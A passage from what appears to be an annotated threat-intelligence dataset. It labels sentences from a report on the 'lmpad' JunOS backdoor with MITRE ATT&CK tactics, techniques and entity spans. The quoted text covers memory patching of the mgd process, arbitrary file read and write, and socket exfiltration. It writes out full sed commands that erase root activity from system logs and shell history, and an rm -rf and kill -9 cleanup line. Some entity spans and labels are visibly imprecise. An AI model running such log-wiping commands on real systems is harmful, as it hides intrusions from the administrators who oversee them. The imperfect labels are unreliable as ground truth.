0.\n6.", "sentence_text": "Then the offset 0x85f6f80 in /proc/${MGD_PID}/mem is replaced with 0.\n7.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Writing zero to a specific memory offset of the running mgd process to modify its behavior.", "entities": [ { "text": "is replaced with 0", "start": 50, "end": 68, "label": "Action" }, { "text": " /proc/${MGD_PID}/mem", "start": 28, "end": 49, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p6-s113-6741d8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 6, "sentence_id": 113, "context_before": "Then the offset 0x85f6f80 in /proc/${MGD_PID}/mem is replaced with 0.\n7.", "sentence_text": "Then the 4 bytes from /proc/${MGD_PID}/mem are read from offset 0x85f6f80 and written with /var/tmp/rts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Reading and modifying memory of the running mgd process to change its behavior.", "entities": [ { "text": "are read from offset 0x85f6f80 and written with /var/tmp/rts", "start": 43, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "/proc/${MGD_PID}/mem", "start": 22, "end": 42, "label": "Infrastructure_Indicator" }, { "text": " /var/tmp/rts", "start": 90, "end": 103, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p7-s114-8b1799", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 114, "context_before": "Then the 4 bytes from /proc/${MGD_PID}/mem are read from offset 0x85f6f80 and written with /var/tmp/rts.", "sentence_text": "Command 0x1:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p7-s115-0b478b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 115, "context_before": "Command 0x1:", "sentence_text": "Post-Exploitation Cleanup The command 0x1 is used to signal to the lmpad that all access logs need to be backed up.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Signaling the device to back up access logs to conceal evidence of malicious activity.", "entities": [ { "text": "access logs", "start": 82, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "is used to signal to the lmpad that all access logs need to be backed up", "start": 42, "end": 114, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s116-9ba02a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 116, "context_before": "Post-Exploitation Cleanup The command 0x1 is used to signal to the lmpad that all access logs need to be backed up.", "sentence_text": "This includes all traces of user login activity to the device.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Removing or backing up traces of user login activity to hide evidence of access.", "entities": [ { "text": " user login activity", "start": 27, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p7-s117-1f05f2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 117, "context_before": "This includes all traces of user login activity to the device.", "sentence_text": "This is most likely done to cover up malicious or unauthorized SSH access to the device using a compromised user.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Hiding traces of unauthorized SSH access performed via a compromised account.", "entities": [ { "text": "to cover up malicious or unauthorized SSH access to the device", "start": 25, "end": 87, "label": "Action" }, { "text": "device", "start": 81, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p7-s118-731f04", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 118, "context_before": "This is most likely done to cover up malicious or unauthorized SSH access to the device using a compromised user.", "sentence_text": "On receiving a packet with value 0x01000000, the lmpad deploys a malicious shell script at the location /var/tmp/pfed_jdhcp6_trace.log.bak.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.008", "name": "Network Device CLI" } ], "procedure": "Deploying a malicious shell script on the device upon receiving a specific packet value.", "entities": [ { "text": "deploys a malicious shell script at the location", "start": 55, "end": 103, "label": "Action" }, { "text": "/var/tmp/pfed_jdhcp6_trace.log.bak", "start": 104, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "malicious shell script ", "start": 65, "end": 88, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p7-s119-b411ef", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 119, "context_before": "On receiving a packet with value 0x01000000, the lmpad deploys a malicious shell script at the location /var/tmp/pfed_jdhcp6_trace.log.bak.", "sentence_text": "This is done by initially writing a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log and then uncompressing it to the file above.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.008", "name": "Network Device CLI" } ], "procedure": "Writing and decompressing a malicious shell script on the device to enable execution.", "entities": [ { "text": " GZIP compressed shell script", "start": 35, "end": 64, "label": "MalwareTool" }, { "text": " /var/tmp/pfed_jdhcp6_trace.log", "start": 67, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "initially writing a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log and then uncompressing it to the file above.", "start": 16, "end": 143, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s120-a65cce", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 120, "context_before": "This is done by initially writing a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log and then uncompressing it to the file above.", "sentence_text": "Then the following actions are taken:\nsh /var/tmp/pfed_jdhcp6_trace.log.bak post rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak kill -9 $$ The contents of the /var/tmp/pfed_jdhcp6_trace.log.bak can be found in Appendix A.\nMemory Patching Attack Cleanup", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.008", "name": "Network Device CLI" } ], "procedure": "Executing a malicious shell script and performing subsequent cleanup operations on the device.", "entities": [ { "text": "Then the following actions are taken", "start": 0, "end": 36, "label": "Action" }, { "text": " kill -9", "start": 153, "end": 161, "label": "Action" }, { "text": "Memory Patching Attack Cleanup", "start": 248, "end": 278, "label": "Action" }, { "text": " rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak", "start": 80, "end": 153, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p7-s121-feb689", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 121, "context_before": "Then the following actions are taken:\nsh /var/tmp/pfed_jdhcp6_trace.log.bak post rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak kill -9 $$ The contents of the /var/tmp/pfed_jdhcp6_trace.log.bak can be found in Appendix A.\nMemory Patching Attack Cleanup", "sentence_text": "The actions performed in the Memory Patching Attack for command 0x01 are reversed after the above is executed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Reversing the previously applied memory patching actions to conceal modifications after execution.", "entities": [ { "text": "reversed after the above is executed.", "start": 73, "end": 110, "label": "Action" }, { "text": "Memory Patching Attack", "start": 29, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p7-s122-6c2f3b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 122, "context_before": "The actions performed in the Memory Patching Attack for command 0x01 are reversed after the above is executed.", "sentence_text": "Command 0x2:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p7-s123-b99c0f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 123, "context_before": "Command 0x2:", "sentence_text": "Log and History Manipulation The command 0x02 is used to remove certain references from specific log files and clean up the root user's history file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.003", "name": "Clear Command History" } ], "procedure": "Removing log file references and clearing the root user’s history to hide attacker activity.", "entities": [ { "text": " is used to remove certain references from specific log files and clean up the root user's history file.", "start": 45, "end": 149, "label": "Action" }, { "text": "pecific log files", "start": 89, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "root user's history file", "start": 124, "end": 148, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p7-s124-9f5545", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 124, "context_before": "Log and History Manipulation The command 0x02 is used to remove certain references from specific log files and clean up the root user's history file.", "sentence_text": "The following is executed to manipulate the log files:\nsed -i \\'\\' \\'/root/d\\' /var/log/interactive-commands sed -i \\'\\' -e \\'/vi/d\\' -e \\'/set/d\\' -e \\'/gdb/d\\' -e \\'/mgd/d\\' /root/.history sed -i \\'\\' \\'/root/d\\' /var/log/messages sed -i \\'\\' \\'/root/d\\' /var/log/auth Command 0x3:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.003", "name": "Clear Command History" } ], "procedure": "Using sed commands to remove evidence of malicious activity from system log files and the root user’s history.", "entities": [ { "text": "sed", "start": 55, "end": 58, "label": "MalwareTool" }, { "text": " /var/log/messages sed -i \\'\\' \\'/root/d\\' /var/log/auth Command", "start": 214, "end": 278, "label": "Infrastructure_Indicator" }, { "text": " /root/.history", "start": 175, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "/var/log/interactive-commands", "start": 79, "end": 108, "label": "Infrastructure_Indicator" }, { "text": " is executed to manipulate the log files", "start": 13, "end": 53, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s125-58d3d2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 125, "context_before": "The following is executed to manipulate the log files:\nsed -i \\'\\' \\'/root/d\\' /var/log/interactive-commands sed -i \\'\\' -e \\'/vi/d\\' -e \\'/set/d\\' -e \\'/gdb/d\\' -e \\'/mgd/d\\' /root/.history sed -i \\'\\' \\'/root/d\\' /var/log/messages sed -i \\'\\' \\'/root/d\\' /var/log/auth Command 0x3:", "sentence_text": "Update recv_buf_command3 This command is seemingly benign as it simply updates the contents of a local variable which is later used to manipulate some file descriptor options later in the main loop.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p7-s126-c456b7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 126, "context_before": "Update recv_buf_command3 This command is seemingly benign as it simply updates the contents of a local variable which is later used to manipulate some file descriptor options later in the main loop.", "sentence_text": "Command 0x4: Read a File The command 0x04 is used to read an arbitrary file, as follows:\n1.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Reading an arbitrary file from the local system.", "entities": [ { "text": "an arbitrary file", "start": 58, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "is used to read an arbitrary file", "start": 42, "end": 75, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s127-7a32c3", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 127, "context_before": "Command 0x4: Read a File The command 0x04 is used to read an arbitrary file, as follows:\n1.", "sentence_text": "The length of the name of the file to be read is read from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Receiving the filename length from the socket as part of a file-reading operation.", "entities": [ { "text": " be read is read from the socket", "start": 37, "end": 69, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s128-a9e9b9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 128, "context_before": "The length of the name of the file to be read is read from the socket.", "sentence_text": "The length is stored in big endian format and prior to use is transformed to little-endian using BSWAP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p7-s129-cd9145", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 129, "context_before": "The length is stored in big endian format and prior to use is transformed to little-endian using BSWAP.", "sentence_text": "Then the name of the file to be read is read from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Reading the filename from the socket in preparation to collect a file from the system.", "entities": [ { "text": "to be read is read from the socket.", "start": 26, "end": 61, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s130-c2ebcc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 130, "context_before": "Then the name of the file to be read is read from the socket.", "sentence_text": "The file is opened and at most 4096 bytes are read from the file at a time.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Reading the contents of a local file in chunks.", "entities": [ { "text": " file ", "start": 59, "end": 65, "label": "Infrastructure_Indicator" }, { "text": " is opened and at most 4096 bytes are read from the file at a time", "start": 8, "end": 74, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s131-68f21a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 131, "context_before": "The file is opened and at most 4096 bytes are read from the file at a time.", "sentence_text": "The length of the read data is then encrypted and sent over the socket.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Encrypting file data and sending it over the network socket.", "entities": [ { "text": " the socket", "start": 59, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "read data is then encrypted and sent over", "start": 18, "end": 59, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p7-s132-62ad49", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 7, "sentence_id": 132, "context_before": "The length of the read data is then encrypted and sent over the socket.", "sentence_text": "Then the read data is sent over the socket.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Sending collected file data over the network socket.", "entities": [ { "text": "socket.", "start": 36, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "the read data is sent over the socket.", "start": 5, "end": 43, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s133-8e44fd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 133, "context_before": "Then the read data is sent over the socket.", "sentence_text": "Command 0x5:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s134-128359", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 134, "context_before": "Command 0x5:", "sentence_text": "Write a File On receiving the command 0x05, the lmpad writes an arbitrary file.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Writing an arbitrary file to the device via command 0x05.", "entities": [ { "text": "lmpad ", "start": 48, "end": 54, "label": "MalwareTool" }, { "text": "writes an arbitrary file", "start": 54, "end": 78, "label": "Action" }, { "text": "arbitrary file", "start": 64, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p8-s135-e2036b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 135, "context_before": "Write a File On receiving the command 0x05, the lmpad writes an arbitrary file.", "sentence_text": "The length of the name of the file to be written is read from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Receiving the filename length over the socket as part of preparing to write an arbitrary file.", "entities": [ { "text": " to be written is read from the socket.", "start": 34, "end": 73, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s136-95081d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 136, "context_before": "The length of the name of the file to be written is read from the socket.", "sentence_text": "The length is stored in reverse and prior to use is transformed using BSWAP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s137-10d55a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 137, "context_before": "The length is stored in reverse and prior to use is transformed using BSWAP.", "sentence_text": "Then the name of the file to be written is read from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Reading the filename from the socket in preparation to write an arbitrary file to the system.", "entities": [ { "text": "is read from the socket.", "start": 40, "end": 64, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s138-0990d4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 138, "context_before": "Then the name of the file to be written is read from the socket.", "sentence_text": "The file is then opened in write mode.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Opening a file in write mode to modify or create data on the system.", "entities": [ { "text": " file", "start": 3, "end": 8, "label": "Infrastructure_Indicator" }, { "text": " opened in write mode.", "start": 16, "end": 38, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s139-669459", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 139, "context_before": "The file is then opened in write mode.", "sentence_text": "The length of the data to be written to the file is read from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Receiving the intended write data length from the socket before modifying a file.", "entities": [ { "text": " file", "start": 43, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "to be written to the file is read from the socket", "start": 23, "end": 72, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s140-f1a602", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 140, "context_before": "The length of the data to be written to the file is read from the socket.", "sentence_text": "Otherwise, the data to be written is read from the socket and written to the file.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "Writing attacker-supplied data from the socket into a file on the device.", "entities": [ { "text": "is read from the socket and written to the file.", "start": 34, "end": 82, "label": "Action" }, { "text": " file", "start": 76, "end": 81, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p8-s141-608f5d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 141, "context_before": "Otherwise, the data to be written is read from the socket and written to the file.", "sentence_text": "Command 0x6:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s142-cabc04", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 142, "context_before": "Command 0x6:", "sentence_text": "Backup Commit Logs The 0x06 command seems to be a precursor to a commit being done on the device using an unauthorized user.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Preparing to hide traces of unauthorized configuration changes by manipulating commit logs", "entities": [ { "text": " device", "start": 89, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "Commit Logs", "start": 7, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "to be a precursor to a commit being done on the device using an unauthorized user.", "start": 42, "end": 124, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s143-b6b0f2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 143, "context_before": "Backup Commit Logs The 0x06 command seems to be a precursor to a commit being done on the device using an unauthorized user.", "sentence_text": "This command is used to take a backup of all the logs associated with a commit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s144-6fece3", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 144, "context_before": "This command is used to take a backup of all the logs associated with a commit.", "sentence_text": "This is done using the pfed_jdhcp6_trace.log.bak script used in the previous commands.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Using pfed_jdhcp6_trace.log.bak script for cleanup operations", "entities": [ { "text": "pfed_jdhcp6_trace.log.bak", "start": 23, "end": 48, "label": "MalwareTool" }, { "text": " done using", "start": 7, "end": 18, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s145-2702a4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 145, "context_before": "This is done using the pfed_jdhcp6_trace.log.bak script used in the previous commands.", "sentence_text": "Like the other commands, this command:\n1. Writes a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Writes a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log", "entities": [ { "text": "/var/tmp/pfed_jdhcp6_trace.log.", "start": 83, "end": 114, "label": "MalwareTool" }, { "text": "Writes a GZIP compressed shell script", "start": 42, "end": 79, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s146-1807f0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 146, "context_before": "Like the other commands, this command:\n1. Writes a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log.", "sentence_text": "Unzips this shell script to /var/tmp/pfed_jdhcp6_trace.log.bak.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Writes a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log", "entities": [ { "text": "Unzips this shell script to", "start": 0, "end": 27, "label": "Action" }, { "text": "pfed_jdhcp6_trace.log.bak.", "start": 37, "end": 63, "label": "MalwareTool" }, { "text": "/var/tmp/", "start": 28, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p8-s147-eb3dcc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 147, "context_before": "Unzips this shell script to /var/tmp/pfed_jdhcp6_trace.log.bak.", "sentence_text": "3. Executes the shell script with the argument backup.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Executes the shell script with the argument backup", "entities": [ { "text": "Executes", "start": 3, "end": 11, "label": "Action" }, { "text": "shell script", "start": 16, "end": 28, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p8-s148-c372e6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 148, "context_before": "3. Executes the shell script with the argument backup.", "sentence_text": "4. Performs the cleanup.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s149-b6ec50", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 149, "context_before": "4. Performs the cleanup.", "sentence_text": "The assumption is that this is done prior to a malicious commit being made on the device.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Assumed preparatory action prior to malicious commit", "entities": [ { "text": "malicious commit being made on the device.", "start": 47, "end": 89, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s150-7eb421", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 150, "context_before": "The assumption is that this is done prior to a malicious commit being made on the device.", "sentence_text": "After this, some commit activity may be expected on the device by a malicious user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s152-c18370", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 152, "context_before": "Command 0x7:", "sentence_text": "Restore Commit Logs from Backup The 0x07 command is a post-commit cleanup command.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Restore commit logs from backup for post-commit cleanup", "entities": [ { "text": "Restore Commit Logs from Backup ", "start": 0, "end": 32, "label": "Action" }, { "text": "post-commit cleanup command.", "start": 54, "end": 82, "label": "Action" }, { "text": "0x07 command", "start": 36, "end": 48, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p8-s153-e6a9ab", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 153, "context_before": "Restore Commit Logs from Backup The 0x07 command is a post-commit cleanup command.", "sentence_text": "Once the malware actor is done with their malicious alterations to the JUNOS configuration on the target, this command may be executed to cover up any traces left behind by such actions.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal on Host" } ], "procedure": "Execute cleanup command after modifying JUNOS configuration to remove traces of malicious activity", "entities": [ { "text": "malware actor", "start": 9, "end": 22, "label": "ThreatActor" }, { "text": "malicious alterations", "start": 42, "end": 63, "label": "Action" }, { "text": "JUNOS configuration", "start": 71, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "executed to cover up any traces", "start": 126, "end": 157, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s154-40fba6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 154, "context_before": "Once the malware actor is done with their malicious alterations to the JUNOS configuration on the target, this command may be executed to cover up any traces left behind by such actions.", "sentence_text": "This is done using the pfed_jdhcp6_trace.log.bak script used in the previous commands.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Using pfed_jdhcp6_trace.log.bak script for evidence cleanup", "entities": [ { "text": "pfed_jdhcp6_trace.log.bak ", "start": 23, "end": 49, "label": "MalwareTool" }, { "text": " done using", "start": 7, "end": 18, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s155-0aaad4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 155, "context_before": "This is done using the pfed_jdhcp6_trace.log.bak script used in the previous commands.", "sentence_text": "Like the other commands, this command:\n1. Writes a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Writes GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log", "entities": [ { "text": "pfed_jdhcp6_trace.log.", "start": 92, "end": 114, "label": "MalwareTool" }, { "text": "/var/tmp/", "start": 83, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "Writes a GZIP compressed shell script", "start": 42, "end": 79, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s156-c5aaed", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 156, "context_before": "Like the other commands, this command:\n1. Writes a GZIP compressed shell script to /var/tmp/pfed_jdhcp6_trace.log.", "sentence_text": "Unzips this shell script to /var/tmp/pfed_jdhcp6_trace.log.bak.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Unzips shell script to /var/tmp/pfed_jdhcp6_trace.log.bak", "entities": [ { "text": "/var/tmp/", "start": 28, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "pfed_jdhcp6_trace.log.bak", "start": 37, "end": 62, "label": "MalwareTool" }, { "text": "Unzips this shell script", "start": 0, "end": 24, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s157-811375", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 157, "context_before": "Unzips this shell script to /var/tmp/pfed_jdhcp6_trace.log.bak.", "sentence_text": "3. Executes the shell script with the argument restore.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Executes shell script with argument restore", "entities": [ { "text": "shell script", "start": 16, "end": 28, "label": "MalwareTool" }, { "text": "Executes", "start": 3, "end": 11, "label": "Action" }, { "text": "with the argument restore", "start": 29, "end": 54, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s158-9b5ad1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 158, "context_before": "3. Executes the shell script with the argument restore.", "sentence_text": "4. Performs the cleanup.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Performs cleanup after script execution", "entities": [ { "text": "Performs the cleanup.", "start": 3, "end": 24, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s159-7a5999", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 159, "context_before": "4. Performs the cleanup.", "sentence_text": "The assumption is that this is done after a malicious 